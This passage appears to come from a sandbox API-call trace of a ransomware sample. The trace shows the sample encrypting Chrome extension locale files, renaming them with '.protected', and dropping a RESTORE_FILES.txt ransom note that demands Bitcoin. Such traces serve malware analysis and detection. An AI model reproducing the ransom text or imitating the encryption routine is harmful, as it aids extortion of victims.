Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.739] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.739] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.740] lstrlenA (lpString="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") returned 684 [0079.740] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.740] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.740] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.740] CloseHandle (hObject=0x164) returned 1 [0079.740] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.740] lstrcmpiW (lpString1="es", lpString2="Windows") returned -1 [0079.740] lstrcmpiW (lpString1="es", lpString2="Program Files") returned -1 [0079.740] lstrcmpiW (lpString1="es", lpString2="Program Files (x86)") returned -1 [0079.740] lstrcmpiW (lpString1="es", lpString2="$Recycle.bin") returned 1 [0079.740] lstrcmpiW (lpString1="es", lpString2="System Volume Information") returned -1 [0079.740] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es") returned 143 [0079.740] lstrcmpW (lpString1="es", lpString2=".") returned 1 [0079.740] lstrcmpW (lpString1="es", lpString2="..") returned 1 [0079.740] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\*") returned 145 [0079.740] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.740] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.740] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.741] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.741] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.741] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.741] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\.") returned 145 [0079.741] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.741] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.741] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.741] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.741] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.741] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.741] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.741] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\..") returned 146 [0079.741] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.741] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.741] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.741] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.741] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.741] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.741] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.741] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.741] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json") returned 157 [0079.741] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.741] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.741] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.741] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.741] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.742] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json") returned 157 [0079.742] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.742] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json") returned 157 [0079.742] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.742] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json") returned 157 [0079.742] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.742] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.743] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.743] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.743] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.743] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.743] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.743] CloseHandle (hObject=0x168) returned 1 [0079.743] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.protected") returned 167 [0079.743] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.protected")) returned 1 [0079.744] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.744] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.744] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\RESTORE_FILES.txt") returned 161 [0079.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.745] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.745] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.746] lstrlenA (lpString="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") returned 684 [0079.746] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0079.746] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.746] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.746] CloseHandle (hObject=0x164) returned 1 [0079.746] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.746] lstrcmpiW (lpString1="fi", lpString2="Windows") returned -1 [0079.746] lstrcmpiW (lpString1="fi", lpString2="Program Files") returned -1 [0079.746] lstrcmpiW (lpString1="fi", lpString2="Program Files (x86)") returned -1 [0079.746] lstrcmpiW (lpString1="fi", lpString2="$Recycle.bin") returned 1 [0079.746] lstrcmpiW (lpString1="fi", lpString2="System Volume Information") returned -1 [0079.746] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi") returned 143 [0079.746] lstrcmpW (lpString1="fi", lpString2=".") returned 1 [0079.746] lstrcmpW (lpString1="fi", lpString2="..") returned 1 [0079.746] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\*") returned 145 [0079.746] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0079.747] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.747] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.747] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.747] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.747] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.747] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\.") returned 145 [0079.747] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.747] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.747] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.747] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.747] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.747] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.747] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.747] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\..") returned 146 [0079.748] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.748] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.748] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.748] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.748] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.748] lstrcmpiW (lpString1="messages.json", lpString2="Program 
Files (x86)") returned -1 [0079.748] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.748] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.748] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json") returned 157 [0079.748] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.748] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.748] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.748] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.748] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.748] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json") returned 157 [0079.748] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.748] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json") returned 157 [0079.748] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.748] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json") returned 157 [0079.748] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.748] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.749] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.749] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.749] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.749] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.749] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.749] CloseHandle (hObject=0x168) returned 1 [0079.749] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.protected") returned 167 [0079.750] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json.protected")) returned 1 [0079.750] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.750] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.750] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\RESTORE_FILES.txt") returned 161 [0079.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.750] 
lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.750] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.751] lstrlenA (lpString="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") returned 684 [0079.751] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
